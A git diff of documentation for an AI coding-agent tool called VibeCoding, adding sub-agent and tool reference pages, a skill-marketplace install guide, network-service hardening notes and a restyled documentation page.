+| Sandbox | Inherited | Sub-agents inherit the parent's sandbox configuration |
+
+### Sub-Agent Isolation
+
+Each sub-agent runs with **fully isolated state**:
+
+- **Own tool registry** — independent `tools.Registry` with its own `workDir`, `Sandbox`, and `JobManager`
+- **Own message history** — separate conversation context
+- **Own session** — independent session storage
+- **Filtered tools** — `subagent_*` tools are removed from sub-agent registries to prevent nesting
+- **Extra context** — includes `SubAgentOperatingContract` instructing the sub-agent to stay within scope
+
+### SDK Usage: Enabling Multi-Agent
+
+```go
+a, err := agent.NewBuilder().
+    WithProvider(myProvider).
+    WithModel("claude-sonnet-4-20250514").
+    WithMode("agent").
+    WithMultiAgent(true). // Enable sub-agent tools
+    Build()
+```
+
+When `WithMultiAgent(true)` is set, the agent's system prompt includes the sub-agent orchestration instructions and the `subagent_spawn/status/send/destroy` tools become available.
+
+### Event Routing with Sub-Agents
+
+Events from sub-agents carry the sub-agent's `AgentID`. Use the `EventRouter` to dispatch events to the right handler:
+
+```go
+// Internal usage example (for reference)
+router := agent.NewEventRouter()
+
+// Register handler for a specific agent
+router.RegisterAgent("agent-1", agent.RouterEventHandlerFunc(func(e agent.Event) error {
+    fmt.Printf("[%s] %v\n", e.AgentID, e.Type)
+    return nil
+}))
+
+// Register global handler for all agents
+router.RegisterGlobal(agent.RouterEventHandlerFunc(func(e agent.Event) error {
+    // Log all events across all agents
+    return nil
+}))
+```
+
+### Best Practices for Sub-Agents
+
+1. **Spawn for independent work** — Sub-agents are ideal for parallel code search, review, testing, or investigation tasks that don't depend on each other.
+2. **Give clear scope** — Each sub-agent task should include: what to do, where to look, what to produce, and when to stop.
+3. **Limit tools** — Restrict tools to what the task needs (e.g., read-only tools for search tasks).
+4. **Poll and verify** — Don't trust sub-agent results blindly. Use `subagent_status` to check, then verify important claims.
+5. **Clean up** — Always `subagent_destroy` finished agents to release resources.
+6. **Avoid over-delegation** — Small, sequential, or highly stateful work is better done inline.
+
+### Approval Forwarding
+
+Sub-agent tool calls that require approval (e.g., `bash` in agent mode) are forwarded to the parent agent's event channel. The parent TUI or approval handler sees `EventToolApprovalRequest` events with the sub-agent's `AgentID`, allowing the user to approve/deny tool calls across all agents from a single interface.
+
+---
+
+## Internal Architecture Reference
+
+For developers who need to understand the internal wiring:
+
+```
+agent/                          # Public package (import this)
+  ├── types.go                  # Agent, Message, Event types
+  ├── provider.go               # Provider, ChatParams, StreamEvent types
+  └── builder.go                # Builder API → calls buildInternal
+
+internal/agent/                 # Internal implementation
+  ├── agent.go                  # Core agent loop
+  ├── factory.go                # AgentFactory (creates agents with isolated registries)
+  │   └── init() { SetBuilderFunc(buildFromPublicBuilder) }
+  ├── bridge.go                 # Type converters (public ↔ internal)
+  │   ├── ProviderAdapter       # Wraps public Provider → internal
+  │   └── AgentAdapter          # Wraps internal Agent → public
+  ├── manager.go                # AgentManager (lifecycle, parent/child tracking)
+  ├── subagent.go               # subagent_spawn/status/send/destroy tools
+  ├── router.go                 # EventRouter (per-agent + global dispatch)
+  └── system_prompt.go          # System prompt builder
+```
+
+The bridge layer in `internal/agent/bridge.go` converts between public and internal types automatically:
+
+- `agent.Builder.Build()` → calls `buildFromPublicBuilder()` → creates internal `Agent` → wraps in `AgentAdapter` → returns `agent.Agent`
+- Public `Provider` → `ProviderAdapter` → internal `provider.Provider`
+- Internal `Event` → `EventToPublic()` → public `agent.Event`
+- Internal `Message` → `MessageToPublic()` → public `agent.Message` (and vice versa)
diff --git a/docs/en/security.md b/docs/en/security.md
index 273b0d5..9420fea 100644
--- a/docs/en/security.md
+++ b/docs/en/security.md
@@ -123,6 +123,25 @@ vibecoding -M yolo
 - May execute dangerous commands
 - May expose sensitive information
 
+## Network Service Hardening
+
+Gateway, Hermes, and A2A can expose HTTP/WebSocket entry points. Treat these services as remote code-execution surfaces whenever tools can run in `agent` or `yolo` mode.
+
+- **Gateway**: enable `auth.enabled` before exposing beyond loopback; startup warns when Gateway listens beyond loopback in `yolo` mode without authentication.
+- **A2A**: standalone A2A binds to `127.0.0.1` by default. Use `--host 0.0.0.0` only for intentional exposure, and configure an auth token.
+- **Hermes WebSocket**: send tokens with `Authorization: Bearer <token>` during the WebSocket handshake. Query-string tokens are accepted only for compatibility.
+- **Working directories**: use `allowedWorkDirs` / `allowed_work_dirs` to restrict per-request or per-platform working directories.
+
+## Trusted Config Shell Commands
+
+Provider API keys can be loaded from shell commands with `apiKey: "!command"`, but this is disabled by default. Enable it only for trusted local config:
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
+Prefer environment-variable references such as `${DEEPSEEK_API_KEY}` for shared configs.
+
 ## Enabling Sandbox
 
 ### Command Line
@@ -543,4 +562,4 @@ Error: Read-only file system
 - [bubblewrap GitHub](https://github.com/containers/bubblewrap)
 - [Linux Namespaces](https://man7.org/linux/man-pages/man7/namespaces.7.html)
 - [seccomp](https://man7.org/linux/man-pages/man2/seccomp.2.html)
-- [Security Best Practices](https://owasp.org/www-project-developer-guide/)
\ No newline at end of file
+- [Security Best Practices](https://owasp.org/www-project-developer-guide/)
diff --git a/docs/en/skillhub.md b/docs/en/skillhub.md
new file mode 100644
index 0000000..875fb9e
--- /dev/null
+++ b/docs/en/skillhub.md
@@ -0,0 +1,221 @@
+# Online Skill Marketplace Integration
+
+VibeCoding is compatible with existing skill marketplaces (SkillHub / ClawHub). Skill packages published on these platforms can be used directly in VibeCoding.
+
+| Platform | URL | Region |
+|----------|-----|--------|
+| **SkillHub** | [https://skillhub.cn](https://skillhub.cn/) | China |
+| **ClawHub** | [https://clawhub.ai](https://clawhub.ai/) | International |
+
+> **Note:** VibeCoding does not have a built-in skill marketplace, but uses the standard
+> skill directory format (`SKILL.md`) that is fully compatible with SkillHub / ClawHub
+> packages. Skills downloaded from these platforms work out of the box — just drop them
+> into your skills directory.
+
+This guide covers:
+
+1. [Installing Skills from Marketplaces](#installing-skills-from-marketplaces) — three steps
+2. [Skill Format Compatibility](#skill-format-compatibility) — standard format details
+3. [Local Skill System](#local-skill-system) — built-in features
+4. [Cron Foundation](#cron-foundation) — scheduled task infrastructure
+
+---
+
+## Installing Skills from Marketplaces
+
+Installing skills from SkillHub / ClawHub takes three steps:
+
+### 1. Download the Skill Package
+
+Download the skill package from the marketplace (typically a directory or archive containing `SKILL.md`).
+
+### 2. Extract to Skills Directory
+
+```bash
+# Global install (available to all projects)
+# Linux/macOS:
+unzip go-expert.zip -d ~/.vibecoding/skills/
+# Windows:
+Expand-Archive go-expert.zip -DestinationPath "$env:APPDATA\vibecoding\skills\"
+
+# Project-level install (current project only)
+unzip go-expert.zip -d .skills/
+```
+
+### 3. Verify Installation
+
+```
+> /skills
+Loaded 3 skills:
+  - go-expert (global)        ← just installed
+  - coding-standards (global)
+  - project-conventions (project)
+```
+
+That's it. The skill is automatically loaded and injected into the system prompt.
+
+---
+
+## Skill Format Compatibility
+
+VibeCoding's skill format is fully compatible with the SkillHub / ClawHub standard:
+
+```
+skill-name/
+├── SKILL.md              # Required: skill definition
+└── references/           # Optional: on-demand reference files
+    ├── api-guide.md
+    └── examples.md
+```
+
+### SKILL.md Standard Format
+
+```markdown
+# Skill Name
+
+Short description.
+
+## Rules
+
+- Rule 1
+- Rule 2
+
+## Examples
+
+...
+```
+
+### Reference Files
+
+Skills can include reference files under a `references/` directory, loaded on demand via the `skill_ref` tool:
+
+```
+> skill_ref(skill="go-expert", ref="references/api-guide.md")
+→ Returns the content of api-guide.md
+```
+
+This allows skills to include extensive reference material without consuming system prompt space.
+
+---
+
+## Local Skill System
+
+In addition to marketplace downloads, you can create local skills directly.
+
+### Skill Directories
+
+| Type | Location | Scope |
+|------|----------|-------|
+| Global | `~/.vibecoding/skills/` (Linux/macOS) or `%APPDATA%\vibecoding\skills\` (Windows) | All projects |
+| Project | `.skills/` (project root) | Current project, overrides global |
+
+### Creating a Skill
+
+```bash
+mkdir -p ~/.vibecoding/skills/go-expert
+cat > ~/.vibecoding/skills/go-expert/SKILL.md << 'EOF'
+# Go Expert
+
+Expert-level Go coding standards.
+
+## Rules
+
+- Use `gofmt` for formatting
+- Follow Effective Go guidelines
+- Return errors; do not panic
+- Use `fmt.Errorf` with `%w` for wrapping
+
+## Testing
+
+- Write table-driven tests
+- Use `t.Run` for subtests
+- Aim for >80% coverage
+EOF
+```
+
+### Using Skills
+
+```
+> /skills
+Loaded 2 skills:
+  - go-expert (global)
+  - project-conventions (project)
+
+> /skill:go-expert
+Loaded skill: go-expert
+```
+
+### Configuration
+
+Configure the global skills directory in `settings.json`:
+
+```json
+{
+  "skillsDir": "~/.vibecoding/skills"
+}
+```
+
+Project skills load automatically from `.skills/` without extra configuration.
+
+---
+
+## Cron Foundation
+
+VibeCoding has an internal cron infrastructure (`internal/cron` package) and TUI command entry points. The cron store persists jobs to `~/.vibecoding/cron.json` and the scheduler checks for due jobs on a 30-second interval.
+
+### `/cron` TUI Commands
+
+Requires multi-agent mode (`--multi-agent` or Ctrl+P to toggle):
+
+```
+> /cron add <description>      — Add a scheduled task
+> /cron list                   — List scheduled tasks
+> /cron enable <id>            — Enable a task
+> /cron disable <id>           — Disable a task
+> /cron remove <id>            — Remove a task
+> /cron run <id>               — Run a task now
+```
+
+### Cron Job Data Model
+
+| Field | Description |
+|-------|-------------|
+| `id` | Unique job ID (e.g. `cron-1716883200`) |
+| `name` | Short task description |
+| `prompt` | Task prompt for sub-agent |
+| `schedule` | 5-field cron expression |
+| `mode` | `agent` or `yolo` |
+| `enabled` | Whether the job is active |
+| `last_run` | Timestamp of last execution |
+| `next_run` | Computed next execution time |
+| `run_count` | Total executions |
+| `last_status` | `success`, `failed`, or `running` |
+
+### Scheduler Architecture
+
+```
+Scheduler loop (every 30s)
+    │
+    ├── List all enabled jobs from store
+    │
+    ├── Check each job: is it due?
+    │   ├── Never run before → due
+    │   ├── NextRun has passed → due
+    │   └── Last run > 1 hour ago → due (fallback)
+    │
+    └── Due jobs → spawn sub-agent
+              │
+              ├── Mark job as "running"
+              ├── Create agent via AgentManager
+              ├── Run agent with job prompt
+              ├── Collect result
+              └── Update job status (success/failed)
+```
+
+---
+
+## Related Documents
+
+- [Skills System](skills.md) — Local skills format and management
+- [Configuration](configuration.md) — Full settings reference
+- [Security](security.md) — Sandbox and approval controls
diff --git a/docs/en/tools.md b/docs/en/tools.md
index c89eaa1..9df05a7 100644
--- a/docs/en/tools.md
+++ b/docs/en/tools.md
@@ -13,6 +13,18 @@ VibeCoding provides a set of built-in tools for file operations, code search, an
 | `grep` | Regex content search | Read-only |
 | `find` | Filename search | Read-only |
 | `ls` | List directory contents | Read-only |
+| `plan` | Publish task plan/status | Read-only |
+| `jobs` | List and manage background jobs | Read-only |
+| `kill` | Stop a running background job | Only standard/yolo |
+| `question` | Ask user multiple-choice questions | Plan mode (TUI only) |
+| `memory` | Read/write persistent memory | Hermes mode |
+| `cron` | Manage scheduled background tasks | Hermes/multi-agent mode |
+| `subagent_spawn` | Start a delegated sub-agent task | Multi-agent mode only |
+| `subagent_status` | Query a sub-agent's status/result | Multi-agent mode only |
+| `subagent_send` | Send follow-up instructions to a sub-agent | Multi-agent mode only |
+| `subagent_destroy` | Stop and remove a sub-agent | Multi-agent mode only |
+| `a2a_dispatch` | Send task to remote A2A agent | A2A Master mode only |
+| `skill_ref` | Load skill reference file | When skills available |
 
 ## Tool Details
 
@@ -52,6 +64,132 @@ Supported image formats: `.png`, `.jpg`, `.jpeg`, `.gif`, `.webp`
 
 ---
 
+### plan - Task Planning
+
+Publish or update a visible task plan. Steps support `pending`, `running`, `done`, and `failed` statuses.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `title` | string | - | Short plan title |
+| `steps` | array | ✓ | Ordered plan steps |
+| `note` | string | - | Optional short note |
+
+**Example:**
+
+```json
+{
+  "title": "Implement structured diffs",
+  "steps": [
+    {"title": "Read tool result flow", "status": "done"},
+    {"title": "Update write/edit results", "status": "running"},
+    {"title": "Run focused tests", "status": "pending"}
+  ]
+}
+```
+
+**Returns:** Structured plan metadata for TUI, print mode, and ACP clients.
+
+---
+
+### subagent_* - Delegated Work
+
+The `subagent_*` tools are registered only when VibeCoding runs with
+`--multi-agent`. They let the main agent delegate bounded work to child agents
+that have isolated messages, context, session, registry, and job-manager state.
+
+Child agents cannot spawn further sub-agents.
+
+#### subagent_spawn
+
+Starts a child agent asynchronously and returns a handle.
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `task` | string | ✓ | Focused delegated task |
+| `mode` | string | - | `plan`, `agent`, or `yolo`; defaults to `agent` |
+| `work_dir` | string | - | Child working directory |
+| `tools` | array | - | Optional allowed tool names |
+| `max_iterations` | integer | - | Iteration cap |
+| `system_prompt_extra` | string | - | Additional child-agent context |
+
+#### subagent_status
+
+Queries status and last result for a handle:
+
+```json
+{ "handle": "agent-1" }
+```
+
+#### subagent_send
+
+Sends a follow-up message to an existing sub-agent:
+
+```json
+{ "handle": "agent-1", "message": "Focus on provider tests next." }
+```
+
+#### subagent_destroy
+
+Destroys a sub-agent and releases its resources:
+
+```json
+{ "handle": "agent-1" }
+```
+
+---
+
+### a2a_dispatch - A2A Remote Agent Dispatch
+
+Send tasks to remote A2A agents registered in `a2a-list.json`. Only registered when launched with `--enable-a2a-master`.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `agent_name` | string | ✓ | Target agent name (auto-enumerated from config) |
+| `message` | string | ✓ | Task message |
+
+**Example:**
+
+```json
+{
+  "agent_name": "code-reviewer",
+  "message": "Review internal/handler.go for code quality"
+}
+```
+
+**Returns:** Text response from the remote agent
+
+See [A2A Protocol - A2A Master Mode](a2a.md#a2a-master-mode) for details.
+
+---
+
+### skill_ref - Skill Reference Loading
+
+Load reference files from skill directories. Only registered when skills are available.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `skill` | string | ✓ | Skill name (directory name) |
+| `ref` | string | ✓ | Reference file path (relative to skill directory) |
+
+**Example:**
+
+```json
+{
+  "skill": "my-conventions",
+  "ref": "references/api-style.md"
+}
+```
+
+**Returns:** Reference file content
+
+---
+
 ### write - File Writing
 
 Create new files or overwrite existing files.
@@ -72,7 +210,7 @@ Create new files or overwrite existing files.
 }
 ```
 
-**Returns:** Success/failure message
+**Returns:** Success/failure message with structured diff metadata when content changes.
 
 ---
 
@@ -115,6 +253,8 @@ Precise text replacement for modifying existing files.
 3. Use sufficiently long `oldText` to ensure unique matching
 4. A single call can contain multiple edit operations
 
+**Returns:** Success/failure message with structured diff metadata when content changes.
+
 ---
 
 ### bash - Command Execution
@@ -226,6 +366,139 @@ List directory contents.
 
 ---
 
+### jobs - Background Job Management
+
+List and check status of background jobs started with `bash async=true`.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `jobId` | int | - | Get detailed status of a specific job by ID |
+| `cleanup` | bool | - | Remove finished jobs from the list |
+
+**Example:**
+
+```json
+{}
+```
+
+**Returns:** List of background jobs with status (running/finished), or detailed info for a specific job including PID, elapsed time, stdout, and stderr.
+
+---
+
+### kill - Stop Background Job
+
+Stop a running background job started with `bash async=true`.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `jobId` | int | ✓ | The job ID to kill |
+
+**Example:**
+
+```json
+{ "jobId": 3 }
+```
+
+**Returns:** Confirmation message with job ID and PID.
+
+---
+
+### question - User Clarification (Plan Mode)
+
+Ask the user a multiple-choice question during plan mode to clarify requirements.
+Only registered in TUI + plan mode. Uses `QuestionHandler` optional interface (type assertion); not exposed in Gateway/Hermes/ACP.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `question` | string | ✓ | The question text |
+| `options` | array | ✓ | List of option strings |
+
+**Example:**
+
+```json
+{
+  "question": "Which database should we use?",
+  "options": ["PostgreSQL", "SQLite", "MongoDB"]
+}
+```
+
+**Returns:** User's selected option or custom answer.
+
+---
+
+### memory - Persistent Memory (Hermes)
+
+Read and write persistent memory stored in `memory.md`. Memory persists across sessions. Only available in Hermes mode.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `action` | string | ✓ | Action: `read`, `add`, `update`, `delete` |
+| `section` | string | - | Section name (e.g., `User Profile`, `Working Memory`, `Lessons Learned`). Required for add/update/delete; optional for read. |
+| `content` | string | - | Content for add/delete actions |
+| `old` | string | - | Old text for update action |
+| `new` | string | - | New replacement text for update action |
+
+**Example:**
+
+```json
+{
+  "action": "add",
+  "section": "User Profile",
+  "content": "Prefers Go over Python for backend work."
+}
+```
+
+**Returns:** Action confirmation or section content.
+
+---
+
+### cron - Scheduled Tasks (Hermes / Multi-Agent)
+
+Manage scheduled background tasks that run via sub-agents. Available in Hermes mode and CLI multi-agent mode.
+
+**Parameters:**
+
+| Parameter | Type | Required | Description |
+|-----------|------|----------|-------------|
+| `action` | string | ✓ | Action: `list`, `create`, `enable`, `disable`, `remove`, `run` |
+| `id` | string | - | Job ID (required for enable/disable/remove/run) |
+| `name` | string | - | Short task name (required for create) |
+| `prompt` | string | - | Task prompt for the sub-agent (required for create) |
+| `schedule` | string | - | Schedule: `@daily`, `@weekly`, `@monthly`, `@hourly`, `@every 30m`, `@every 2h`, or empty for one-shot |
+| `oneshot` | bool | - | If true, run once then auto-disable |
+| `mode` | string | - | Agent mode: `agent` or `yolo` (default: `yolo`) |
+
+**Example:**
+
+```json
+{
+  "action": "create",
+  "name": "daily-check",
+  "prompt": "Check for outdated dependencies and report.",
+  "schedule": "@daily"
+}
+```
+
+**Returns:** Job list, creation confirmation, or action result.
+
+---
+
+### MCP Dynamic Tools
+
+Tools, resources, and prompts from MCP (Model Context Protocol) servers are auto-discovered and registered per session. Tool names and parameters are defined by the MCP server, not VibeCoding. MCP tools appear in the tool list alongside built-in tools.
+
+See [Skills](skills.md) and [Configuration](configuration.md) for MCP server setup.
+
+---
+
 ## Tool Usage Patterns
 
 ### Read-Modify-Write Pattern
diff --git a/docs/index.html b/docs/index.html
index 31782dd..b0b670e 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -4,31 +4,96 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>VibeCoding Documentation</title>
-    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&family=Roboto+Mono:wght@400;500&display=swap" rel="stylesheet">
-    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
+    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+    <link href="https://fonts.googleapis.com/icon?family=Material+Icons+Outlined" rel="stylesheet">
     <script src="https://cdn.jsdelivr.net/npm/marked/marked.min.js"></script>
     <style>
         :root {
-            --md-primary: #1976D2;
-            --md-primary-dark: #1565C0;
-            --md-primary-light: #BBDEFB;
-            --md-accent: #FF4081;
-            --md-surface: #FFFFFF;
-            --md-background: #FAFAFA;
-            --md-on-primary: #FFFFFF;
-            --md-on-surface: #212121;
-            --md-on-surface-medium: #757575;
-            --md-on-surface-disabled: #BDBDBD;
-            --md-divider: #E0E0E0;
-            --md-error: #D32F2F;
-            --md-success: #388E3C;
-            --md-shadow-1: 0 1px 3px rgba(0,0,0,0.12), 0 1px 2px rgba(0,0,0,0.24);
-            --md-shadow-2: 0 3px 6px rgba(0,0,0,0.16), 0 3px 6px rgba(0,0,0,0.23);
-            --md-shadow-3: 0 10px 20px rgba(0,0,0,0.19), 0 6px 6px rgba(0,0,0,0.23);
-            --md-shadow-4: 0 14px 28px rgba(0,0,0,0.25), 0 10px 10px rgba(0,0,0,0.22);
-            --md-radius: 4px;
+            /* Colors - Modern Indigo palette */
+            --primary: #6366f1;
+            --primary-hover: #4f46e5;
+            --primary-light: #e0e7ff;
+            --primary-dark: #3730a3;
+            --accent: #f43f5e;
+            --accent-light: #ffe4e6;
+            
+            /* Surfaces */
+            --surface: #ffffff;
+            --surface-hover: #f8fafc;
+            --surface-active: #f1f5f9;
+            --background: #f8fafc;
+            --background-alt: #f1f5f9;
+            
+            /* Text */
+            --text-primary: #0f172a;
+            --text-secondary: #475569;
+            --text-muted: #94a3b8;
+            --text-disabled: #cbd5e1;
+            --text-inverse: #ffffff;
+            
+            /* Borders */
+            --border: #e2e8f0;
+            --border-light: #f1f5f9;
+            --border-focus: var(--primary);
+            
+            /* Status */
+            --success: #10b981;
+            --success-light: #d1fae5;
+            --error: #ef4444;
+            --error-light: #fee2e2;
+            --warning: #f59e0b;
+            --warning-light: #fef3c7;
+            --info: #3b82f6;
+            --info-light: #dbeafe;
+            
+            /* Shadows */
+            --shadow-xs: 0 1px 2px rgba(0,0,0,0.05);
+            --shadow-sm: 0 1px 3px rgba(0,0,0,0.1), 0 1px 2px rgba(0,0,0,0.06);
+            --shadow-md: 0 4px 6px -1px rgba(0,0,0,0.1), 0 2px 4px -1px rgba(0,0,0,0.06);
+            --shadow-lg: 0 10px 15px -3px rgba(0,0,0,0.1), 0 4px 6px -2px rgba(0,0,0,0.05);
+            --shadow-xl: 0 20px 25px -5px rgba(0,0,0,0.1), 0 10px 10px -5px rgba(0,0,0,0.04);
+            
+            /* Spacing */
+            --radius-sm: 6px;
+            --radius-md: 8px;
+            --radius-lg: 12px;
+            --radius-xl: 16px;
+            
+            /* Layout */
             --sidebar-width: 280px;
             --header-height: 64px;
+            --content-max-width: 900px;
+            
+            /* Transitions */
+            --transition-fast: 150ms cubic-bezier(0.4, 0, 0.2, 1);
+            --transition-normal: 200ms cubic-bezier(0.4, 0, 0.2, 1);
+            --transition-slow: 300ms cubic-bezier(0.4, 0, 0.2, 1);
+        }
+
+        /* Dark mode */
+        @media (prefers-color-scheme: dark) {
+            :root {
+                --surface: #1e293b;
+                --surface-hover: #334155;
+                --surface-active: #475569;
+                --background: #0f172a;
+                --background-alt: #1e293b;
+                
+                --text-primary: #f1f5f9;
+                --text-secondary: #94a3b8;
+                --text-muted: #64748b;
+                --text-disabled: #475569;
+                
+                --border: #334155;
+                --border-light: #1e293b;
+                
+                --primary-light: #312e81;
+                --accent-light: #881337;
+                --success-light: #064e3b;
+                --error-light: #7f1d1d;
+                --warning-light: #78350f;
+                --info-light: #1e3a5f;
+            }
         }
 
         * {
@@ -38,10 +103,10 @@
         }
 
         body {
-            font-family: 'Roboto', -apple-system, BlinkMacSystemFont, sans-serif;
+            font-family: 'Inter', -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;
             line-height: 1.6;
-            color: var(--md-on-surface);
-            background-color: var(--md-background);
+            color: var(--text-primary);
+            background-color: var(--background);
             -webkit-font-smoothing: antialiased;
             -moz-osx-font-smoothing: grayscale;
         }
@@ -53,35 +118,42 @@
             left: 0;
             right: 0;
             height: var(--header-height);
-            background-color: var(--md-primary);
-            color: var(--md-on-primary);
+            background-color: var(--surface);
+            border-bottom: 1px solid var(--border);
             display: flex;
             align-items: center;
             padding: 0 24px;
-            box-shadow: var(--md-shadow-2);
             z-index: 1000;
+            backdrop-filter: blur(12px);
+            background-color: rgba(255, 255, 255, 0.9);
+        }
+
+        @media (prefers-color-scheme: dark) {
+            .app-bar {
+                background-color: rgba(30, 41, 59, 0.9);
+            }
         }
 
         .app-bar__menu {
             display: none;
             background: none;
             border: none;
-            color: var(--md-on-primary);
+            color: var(--text-primary);
             cursor: pointer;
             padding: 8px;
             margin-right: 16px;
-            border-radius: 50%;
-            transition: background-color 0.2s;
+            border-radius: var(--radius-md);
+            transition: background-color var(--transition-fast);
         }
 
         .app-bar__menu:hover {
-            background-color: rgba(255,255,255,0.1);
+            background-color: var(--surface-hover);
         }
 
         .app-bar__title {
-            font-size: 20px;
-            font-weight: 500;
-            letter-spacing: 0.02em;
+            font-size: 18px;
+            font-weight: 600;
+            color: var(--text-primary);
             flex: 1;
             display: flex;
             align-items: center;
@@ -89,8 +161,8 @@
         }
 
         .app-bar__logo {
-            width: 32px;
-            height: 32px;
+            width: 28px;
+            height: 28px;
         }
 
         .app-bar__actions {
@@ -99,57 +171,75 @@
             gap: 8px;
         }
 
-        .github-btn {
+        .btn {
             display: inline-flex;
             align-items: center;
-            gap: 8px;
-            padding: 6px 16px;
-            border: 1px solid rgba(255,255,255,0.5);
-            background: transparent;
-            color: var(--md-on-primary);
+            gap: 6px;
+            padding: 8px 16px;
+            border: 1px solid var(--border);
+            background: var(--surface);
+            color: var(--text-primary);
             cursor: pointer;
-            border-radius: 16px;
-            font-size: 14px;
+            border-radius: var(--radius-md);
+            font-size: 13px;
             font-weight: 500;
-            transition: all 0.2s;
-            font-family: 'Roboto', sans-serif;
+            transition: all var(--transition-fast);
+            font-family: inherit;
             text-decoration: none;
+            white-space: nowrap;
         }
 
-        .github-btn:hover {
-            background-color: rgba(255,255,255,0.15);
-            border-color: rgba(255,255,255,0.8);
+        .btn:hover {
+            background: var(--surface-hover);
+            border-color: var(--text-muted);
         }
 
-        .github-btn svg {
-            width: 18px;
-            height: 18px;
+        .btn svg {
+            width: 16px;
+            height: 16px;
             fill: currentColor;
         }
 
-        .lang-chip {
-            display: inline-flex;
-            align-items: center;
-            padding: 6px 16px;
-            border: 1px solid rgba(255,255,255,0.5);
+        .btn--primary {
+            background: var(--primary);
+            border-color: var(--primary);
+            color: var(--text-inverse);
+        }
+
+        .btn--primary:hover {
+            background: var(--primary-hover);
+            border-color: var(--primary-hover);
+        }
+
+        .lang-switcher {
+            display: flex;
+            background: var(--background-alt);
+            border-radius: var(--radius-md);
+            padding: 2px;
+            gap: 2px;
+        }
+
+        .lang-btn {
+            padding: 6px 12px;
+            border: none;
             background: transparent;
-            color: var(--md-on-primary);
+            color: var(--text-secondary);
             cursor: pointer;
-            border-radius: 16px;
-            font-size: 14px;
+            border-radius: var(--radius-sm);
+            font-size: 13px;
             font-weight: 500;
-            transition: all 0.2s;
-            font-family: 'Roboto', sans-serif;
+            transition: all var(--transition-fast);
+            font-family: inherit;
         }
 
-        .lang-chip:hover {
-            background-color: rgba(255,255,255,0.15);
-            border-color: rgba(255,255,255,0.8);
+        .lang-btn:hover {
+            color: var(--text-primary);
         }
 
-        .lang-chip.active {
-            background-color: rgba(255,255,255,0.2);
-            border-color: var(--md-on-primary);
+        .lang-btn.active {
+            background: var(--surface);
+            color: var(--text-primary);
+            box-shadow: var(--shadow-xs);
         }
 
         /* Layout */
@@ -159,68 +249,75 @@
             min-height: calc(100vh - var(--header-height));
         }
 
-        /* Sidebar / Navigation Drawer */
+        /* Sidebar */
         .nav-drawer {
             position: fixed;
             top: var(--header-height);
             left: 0;
             width: var(--sidebar-width);
             height: calc(100vh - var(--header-height));
-            background-color: var(--md-surface);
-            border-right: 1px solid var(--md-divider);
+            background-color: var(--surface);
+            border-right: 1px solid var(--border);
             overflow-y: auto;
             z-index: 900;
-            transition: transform 0.3s cubic-bezier(0.4, 0, 0.2, 1);
+            transition: transform var(--transition-slow);
         }
 
         .nav-drawer__header {
-            padding: 16px;
-            border-bottom: 1px solid var(--md-divider);
+            padding: 20px 16px 12px;
+            border-bottom: 1px solid var(--border-light);
         }
 
         .nav-drawer__title {
-            font-size: 14px;
-            font-weight: 500;
-            color: var(--md-on-surface-medium);
+            font-size: 11px;
+            font-weight: 600;
+            color: var(--text-muted);
             text-transform: uppercase;
             letter-spacing: 0.08em;
         }
 
         .nav-drawer__list {
             list-style: none;
-            padding: 8px 0;
+            padding: 8px;
         }
 
         .nav-drawer__item {
             display: flex;
             align-items: center;
-            padding: 12px 16px;
-            color: var(--md-on-surface);
+            padding: 10px 12px;
+            color: var(--text-secondary);
             text-decoration: none;
             cursor: pointer;
-            transition: background-color 0.2s;
+            transition: all var(--transition-fast);
             font-size: 14px;
             font-weight: 400;
+            border-radius: var(--radius-md);
+            margin-bottom: 2px;
         }
 
         .nav-drawer__item:hover {
-            background-color: rgba(0, 0, 0, 0.04);
+            background-color: var(--surface-hover);
+            color: var(--text-primary);
         }
 
         .nav-drawer__item.active {
-            background-color: var(--md-primary-light);
-            color: var(--md-primary);
+            background-color: var(--primary-light);
+            color: var(--primary);
             font-weight: 500;
         }
 
-        .nav-drawer__item .material-icons {
-            margin-right: 16px;
+        .nav-drawer__item .material-icons-outlined {
+            margin-right: 12px;
             font-size: 20px;
-            color: var(--md-on-surface-medium);
+            color: var(--text-muted);
         }
 
-        .nav-drawer__item.active .material-icons {
-            color: var(--md-primary);
+        .nav-drawer__item:hover .material-icons-outlined {
+            color: var(--text-secondary);
+        }
+
+        .nav-drawer__item.active .material-icons-outlined {
+            color: var(--primary);
         }
 
         /* Main Content */
@@ -228,88 +325,94 @@
             flex: 1;
             width: calc(100% - var(--sidebar-width));
             margin-left: var(--sidebar-width);
-            padding: 32px 48px;
-            max-width: min(1600px, 100% - var(--sidebar-width));
+            padding: 32px;
+            max-width: calc(var(--content-max-width) + var(--sidebar-width) + 64px);
         }
 
         .content-card {
-            background-color: var(--md-surface);
-            border-radius: var(--md-radius);
-            box-shadow: var(--md-shadow-1);
-            padding: 32px;
+            background-color: var(--surface);
+            border-radius: var(--radius-lg);
+            border: 1px solid var(--border);
+            padding: 40px;
             min-height: 400px;
+            max-width: var(--content-max-width);
         }
 
         /* Markdown Styles */
         .content-card h1 {
-            font-size: 28px;
-            font-weight: 500;
-            color: var(--md-on-surface);
+            font-size: 32px;
+            font-weight: 700;
+            color: var(--text-primary);
             margin-bottom: 24px;
             padding-bottom: 16px;
-            border-bottom: 1px solid var(--md-divider);
-            letter-spacing: 0.02em;
+            border-bottom: 2px solid var(--border);
+            letter-spacing: -0.02em;
+            line-height: 1.2;
         }
